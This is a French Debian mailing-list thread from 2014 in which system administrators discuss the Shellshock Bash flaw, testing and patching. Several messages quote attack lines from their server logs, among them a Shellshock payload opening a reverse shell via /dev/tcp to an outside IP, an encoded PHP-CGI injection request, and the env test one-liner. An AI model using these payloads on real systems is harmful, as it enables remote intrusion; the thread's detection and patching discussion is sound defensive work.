Twitter iPhone pliant OnePlus 11 PS5 Disney+ Orange Livebox Windows 11

Linux et Unix affectés par une faille critique dans Bash

32 réponses
Avatar
andre_debian
La vuln=E9rabilit=E9 pourrait constituer une plus grande menace que Heartbl=
eed

www.developpez.com/actu/75661/Linux-et-Unix-affectes-par-une-faille-critiqu=
e-dans-Bash-la-vulnerabilite-pourrait-constituer-une-plus-grande-menace-que=
=2DHeartbleed/

http://seclists.org/oss-sec/2014/q3/649

Info, hoax ou intox ?

Andr=E9

--
Lisez la FAQ de la liste avant de poser une question :
http://wiki.debian.org/fr/FrenchLists

Pour vous DESABONNER, envoyez un message avec comme objet "unsubscribe"
vers debian-user-french-REQUEST@lists.debian.org
En cas de soucis, contactez EN ANGLAIS listmaster@lists.debian.org
Archive: https://lists.debian.org/201409252224.51179.andre_debian@numericable.fr

10 réponses

1 2 3 4
Avatar
daniel huhardeaux
Le 26/09/2014 15:12, Philippe Gras a écrit :

Le 26 sept. 14 à 11:44, Sébastien NOBILI a écrit :

Bonjour,

Le vendredi 26 septembre 2014 à 11:03, Frédéric MASSOT a écrit :
Sur un serveur web, est-ce que le fait d'avoir le lien "/bin/sh"
vers dash
empêche ce type d'attaque ou limite l'attaque à certain CGI mal écrit ?



Si tous les CGI utilisent « /bin/sh », alors pas de problème. En
revanche, ceux
qui utiliseraient explicitement « /bin/bash » seraient impactés.

La meilleure parade reste de toute façon la mise-à-jour de Bash…



Bien sûr. Ceci dit, et si la faille existe depuis 22 ans comme c'était
écrit dans l'article,
elle n'a sans doute pas été connue par énormément de pirates
potentiels… Ce n'est
certainement pas la peine de flipper.



Ah ? Si tu gères des serveurs web je te propose de faire un simple cat
<fichier log serveur web>|grep "() {" et de compter le nombre de
tentatives d'accès comme par exemple

89.207.135.125 - - [25/Sep/2014:12:06:47 +0200] "GET
/cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 345 "-" "() { :;}; /bin/ping
-c 1 198.101.206.138"

ou encore

202.38.120.248 213.239.227.108 - [26/Sep/2014:12:03:36 +0200] "GET /
HTTP/1.0" 200 961 "-" "() { :;}; /bin/bash -c '/bin/bash -i >&
/dev/tcp/195.225.34.101/3333 0>&1'"

[...]

--
Daniel

--
Lisez la FAQ de la liste avant de poser une question :
http://wiki.debian.org/fr/FrenchLists

Pour vous DESABONNER, envoyez un message avec comme objet "unsubscribe"
vers
En cas de soucis, contactez EN ANGLAIS
Archive: https://lists.debian.org/
Avatar
David Guyot
--=-svFExWBmCF1Zg3+E3Qk4
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: quoted-printable

Le vendredi 26 septembre 2014 à 16:38 +0200, daniel huhardeaux a
écrit :
Ah ? Si tu gères des serveurs web je te propose de faire un simple c at
<fichier log serveur web>|grep "() {" et de compter le nombre de
tentatives d'accès comme par exemple

89.207.135.125 - - [25/Sep/2014:12:06:47 +0200] "GET
/cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 345 "-" "() { :;}; /bin/ping
-c 1 198.101.206.138"

ou encore

202.38.120.248 213.239.227.108 - [26/Sep/2014:12:03:36 +0200] "GET /
HTTP/1.0" 200 961 "-" "() { :;}; /bin/bash -c '/bin/bash -i >&
/dev/tcp/195.225.34.101/3333 0>&1'"


D'accord avec Daniel sur ce point, d'autant plus que j'ai observé le
second exemple de logs sur un de mes serveurs, ce qui correspond à une
tentative d'implantation de porte dérobée —
https://securelist.com/blog/research/66719/shellshock-and-its-early-adopter s/

Cordialement.
--
David Guyot
Administrateur système, réseau et télécom / Sysadmin
Europe Camions Interactive / Stockway
Moulin Collot
F-88500 Ambacourt
03 29 30 47 85

--=-svFExWBmCF1Zg3+E3Qk4
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part
Content-Transfer-Encoding: 7bit

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iQIcBAABAgAGBQJUJXv3AAoJEAPBMoJ4TVG5a34P/iF4TC0nXTVuggSYdt2BuSEB
uQhuc9yUrUU81chg7KKBAN/c5LzwoXUdKpvX8W09m6KjEzSkgJGdDN4TTLAXz5+Q
rHi9FmT/LHIlNxdulKK7cLkS8IxtA4ExWu7ymccd5m213M50GjEi+6jWdpisDXqz
Wzw+YD9pXcjKw618KYbKB0uPUY+1vQG+HABwUxUV/mQFiBeOuWJa2zre1FOFZwqe
DNljbxKpOWc4q00yIyONOuzmYTmzqf2pIAJtOTc3OCOCT1aCkICJI9DZnqSmyGtz
jtZFC+ZrJ9zSrONafzDeFebUTf9xEfkCl2ncBil+ONXCOKOwvMLuOpAPO6eK7FMM
Jyth6n9anbGtAtt0znmZcjQHb0xlx7o6XmQJLfwYHph0HxWnE6cUJGsKch8VHP5d
ecD7xr3cP1GOaRXIhnre7EAyA3Skim0UNeUv550JsunN8hwd4uwj+OzZoD4hGh6a
wQaFfUAHR6XepxMVfZhc9ZY0+J7SZdUY7Z+jGm003gIGP+lsltsCDImwlUA8OyXF
Ej5AVHU1Ht5oCH3lNzJ2c2lKUd5ObBxo2mIPBUnbHBD3px1JEQIML7H7xeHe24e9
v6vUefsWU1jkDgos0DmDjRkz9au8J0SFPgCpnKoCRfCWKnxWeRW2sNh7aMZqBkVD
tZjfZFl5OL4RVRCq/517
=GcXI
-----END PGP SIGNATURE-----

--=-svFExWBmCF1Zg3+E3Qk4--

--
Lisez la FAQ de la liste avant de poser une question :
http://wiki.debian.org/fr/FrenchLists

Pour vous DESABONNER, envoyez un message avec comme objet "unsubscribe"
vers
En cas de soucis, contactez EN ANGLAIS
Archive: https://lists.debian.org/
Avatar
Philippe Gras
Le 26 sept. 14 à 16:45, David Guyot a écrit :

Le vendredi 26 septembre 2014 à 16:38 +0200, daniel huhardeaux a
écrit :
Ah ? Si tu gères des serveurs web je te propose de faire un simple
cat
<fichier log serveur web>|grep "() {" et de compter le nombre de
tentatives d'accès comme par exemple

89.207.135.125 - - [25/Sep/2014:12:06:47 +0200] "GET
/cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 345 "-" "() { :;}; /bin/
ping
-c 1 198.101.206.138"

ou encore

202.38.120.248 213.239.227.108 - [26/Sep/2014:12:03:36 +0200] "GET /
HTTP/1.0" 200 961 "-" "() { :;}; /bin/bash -c '/bin/bash -i >&
/dev/tcp/195.225.34.101/3333 0>&1'"





J'en ai aussi, mais pas autant que des exploits classiques sur des
CMS vérolés.

Et comme ça tombe aussi dans les 404… Je ne me prends pas trop la
tête avec.

D'accord avec Daniel sur ce point, d'autant plus que j'ai observé le
second exemple de logs sur un de mes serveurs, ce qui correspond à une
tentative d'implantation de porte dérobée —
https://securelist.com/blog/research/66719/shellshock-and-its-early-
adopters/



Attention, je n'ai pas écrit non plus de ne pas faire de m-à-j ! La
publication de la
faille va sûrement précipiter un paquets de gonziers à l'essayer un
peu partout…


Cordialement.
--
David Guyot
Administrateur système, réseau et télécom / Sysadmin
Europe Camions Interactive / Stockway
Moulin Collot
F-88500 Ambacourt
03 29 30 47 85



--
Lisez la FAQ de la liste avant de poser une question :
http://wiki.debian.org/fr/FrenchLists

Pour vous DESABONNER, envoyez un message avec comme objet "unsubscribe"
vers
En cas de soucis, contactez EN ANGLAIS
Archive: https://lists.debian.org/
Avatar
Dominique Asselineau
Philippe Gras wrote on Fri, Sep 26, 2014 at 05:32:58PM +0200

Le 26 sept. 14 à 16:45, David Guyot a écrit :

>Le vendredi 26 septembre 2014 à 16:38 +0200, daniel huhardeaux a
>écrit :
>>Ah ? Si tu gères des serveurs web je te propose de faire un
>>simple cat
>><fichier log serveur web>|grep "() {" et de compter le nombre de
>>tentatives d'accès comme par exemple
>>
>>89.207.135.125 - - [25/Sep/2014:12:06:47 +0200] "GET
>>/cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 345 "-" "() { :;};
>>/bin/ping
>>-c 1 198.101.206.138"
>>
>>ou encore
>>
>>202.38.120.248 213.239.227.108 - [26/Sep/2014:12:03:36 +0200] "GET /
>>HTTP/1.0" 200 961 "-" "() { :;}; /bin/bash -c '/bin/bash -i >&
>>/dev/tcp/195.225.34.101/3333 0>&1'"

J'en ai aussi, mais pas autant que des exploits classiques sur des
CMS vérolés.

Et comme ça tombe aussi dans les 404… Je ne me prends pas trop la
tête avec.

>D'accord avec Daniel sur ce point, d'autant plus que j'ai observé le
>second exemple de logs sur un de mes serveurs, ce qui correspond à une
>tentative d'implantation de porte dérobée —
>https://securelist.com/blog/research/66719/shellshock-and-its-early-adopters/

Attention, je n'ai pas écrit non plus de ne pas faire de m-à-j ! La
publication de la
faille va sûrement précipiter un paquets de gonziers à l'essayer un
peu partout…



En effet, j'ai 2 trucs du même genre depuis hier justement, alors que
mes logs remontent assez loin.

Dominique
--

--
Lisez la FAQ de la liste avant de poser une question :
http://wiki.debian.org/fr/FrenchLists

Pour vous DESABONNER, envoyez un message avec comme objet "unsubscribe"
vers
En cas de soucis, contactez EN ANGLAIS
Archive: https://lists.debian.org/
Avatar
David Pinson
Le 26/09/2014 11:16, a écrit :
On Friday 26 September 2014 07:56:06 JUPIN Alain wrote:
env x='() { :;}; echo vulnerable' bash -c 'echo hello'


J'ai upgradé bash et relancé, tapé la commande ci-dessus
et j'ai ce message de warning :

"bash: warning: x: ignoring function definition attempt
bash: erreur lors de l'import de la définition de fonction pour « x »
hello"

Quid ?

André




C'est parfait car c'est patché !
linuxement vôtre,
David P

--
Lisez la FAQ de la liste avant de poser une question :
http://wiki.debian.org/fr/FrenchLists

Pour vous DESABONNER, envoyez un message avec comme objet "unsubscribe"
vers
En cas de soucis, contactez EN ANGLAIS
Archive: https://lists.debian.org/
Avatar
nicolas.patrois
Le 26/09/2014 20:34:42, David Pinson a écrit :

C'est parfait car c'est patché !



J’ai mis à jour ce matin et pas redémarré mes sessio ns.
J’ai la même sortie.

nicolas patrois : pts noir asocial
--
RÉALISME

M : Qu'est-ce qu'il nous faudrait pour qu'on nous considère comme des
humains ? Un cerveau plus gros ?
P : Non... Une carte bleue suffirait...

--
Lisez la FAQ de la liste avant de poser une question :
http://wiki.debian.org/fr/FrenchLists

Pour vous DESABONNER, envoyez un message avec comme objet "unsubscribe"
vers
En cas de soucis, contactez EN ANGLAIS
Archive: https://lists.debian.org/
Avatar
admini
pendant ce temps ca scanne sévère:

() { :;}; /bin/bash -c "echo testing9123123"; /bin/uname -a


je vois ça sur mon site de production.

--
Lisez la FAQ de la liste avant de poser une question :
http://wiki.debian.org/fr/FrenchLists

Pour vous DESABONNER, envoyez un message avec comme objet "unsubscribe"
vers
En cas de soucis, contactez EN ANGLAIS
Archive: https://lists.debian.org/
Avatar
Philippe Gras
Zut !

~# env X="() { :;} ; echo busted" /bin/sh -c "echo completed"
busted
completed
~# env X="() { :;} ; echo busted" `which bash` -c "echo completed"
busted
completed

Par contre dans mes logs, je n'ai que des trucs comme ça :

142.4.195.183 - - [26/Sep/2014:00:59:39 +0200] "POST /cgi-bin/php/%63%
67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D%64+%6D%6F%64+%2D%64+%73%
75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73%3D%22%22+%2D%64+%64%6E%65+
%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F
%72%65%64%69%72%65%63%74%3D%30+%2D%64+%74%5F%3D%30+%2D%64+%75%74+%2D%
6E HTTP/1.1" 403 168 "-" "-"
46.165.221.166 - - [26/Sep/2014:00:59:40 +0200] "POST /cgi-bin/php/%
63%67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D%64+%6D%6F%64+%2D%64+%
73%75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73%3D%22%22+%2D%64+%64%6E%
65+%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+%63%67%69%2E%66%6F%72%63%
65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%74%5F%3D%30+%2D%64+%75%74+
%2D%6E HTTP/1.1" 403 168 "-" "-"

Le 26 sept. 14 à 22:52, admini a écrit :

pendant ce temps ca scanne sévère:

() { :;}; /bin/bash -c "echo testing9123123"; /bin/uname -a


je vois ça sur mon site de production.

--
Lisez la FAQ de la liste avant de poser une question :
http://wiki.debian.org/fr/FrenchLists

Pour vous DESABONNER, envoyez un message avec comme objet
"unsubscribe"
vers
En cas de soucis, contactez EN ANGLAIS
Archive: https://lists.debian.org/




--
Lisez la FAQ de la liste avant de poser une question :
http://wiki.debian.org/fr/FrenchLists

Pour vous DESABONNER, envoyez un message avec comme objet "unsubscribe"
vers
En cas de soucis, contactez EN ANGLAIS
Archive: https://lists.debian.org/
Avatar
Vincent Lefevre
On 2014-09-26 16:38:00 +0200, daniel huhardeaux wrote:
Ah ? Si tu gères des serveurs web je te propose de faire un simple
cat <fichier log serveur web>|grep "() {" et de compter le nombre de
tentatives d'accès comme par exemple



Et même: grep '() *{'

J'en ai eu 3 le 25 septembre. Et comme j'ai conservé mes logs depuis
11 ans, j'en ai profité pour vérifier dans tous les logs passés (au
cas où quelqu'un aurait été au courant et ne l'aurait dit à personne)
et je n'ai pas trouvé de telle requête. La NSA ne devait pas être au
courant. :)

--
Vincent Lefèvre - Web: <https://www.vinc17.net/>
100% accessible validated (X)HTML - Blog: <https://www.vinc17.net/blog/>
Work: CR INRIA - computer arithmetic / AriC project (LIP, ENS-Lyon)

--
Lisez la FAQ de la liste avant de poser une question :
http://wiki.debian.org/fr/FrenchLists

Pour vous DESABONNER, envoyez un message avec comme objet "unsubscribe"
vers
En cas de soucis, contactez EN ANGLAIS
Archive: https://lists.debian.org/
Avatar
Frederic MASSOT
Le 26/09/2014 20:34, David Pinson a écrit :
Le 26/09/2014 11:16, a écrit :
On Friday 26 September 2014 07:56:06 JUPIN Alain wrote:
env x='() { :;}; echo vulnerable' bash -c 'echo hello'


J'ai upgradé bash et relancé, tapé la commande ci-dessus
et j'ai ce message de warning :

"bash: warning: x: ignoring function definition attempt
bash: erreur lors de l'import de la définition de fonction pour « x »
hello"

Quid ?

André




C'est parfait car c'est patché !
linuxement vôtre,



Pas tout à fait, il y a eu deux patch successifs, le premier n'ayant pas
complètement corrigé le trou de sécurité.

Si tu as une erreur de Bash, c'est qu'il n'y a que le premier patch
d'appliqué, avec les deux patch tu n'aurais que le message "hello".

Pour testing, la version de Bash avec le deuxième patch était encore ce
matin dans SID. N'oubliez pas le chemin de SID vers testing en cas de
pépin de sécurité est de deux jours. Si vous souhaitez des rustines plus
rapides il faut utiliser SID ou la version stable de Debian.



--
============================================= | FRÉDÉRIC MASSOT |
| http://www.juliana-multimedia.com |
| mailto: |
| +33.(0)2.97.54.77.94 +33.(0)6.67.19.95.69 |
==========================Þbian=GNU/Linux==
--
Lisez la FAQ de la liste avant de poser une question :
http://wiki.debian.org/fr/FrenchLists

Pour vous DESABONNER, envoyez un message avec comme objet "unsubscribe"
vers
En cas de soucis, contactez EN ANGLAIS
Archive: https://lists.debian.org/
1 2 3 4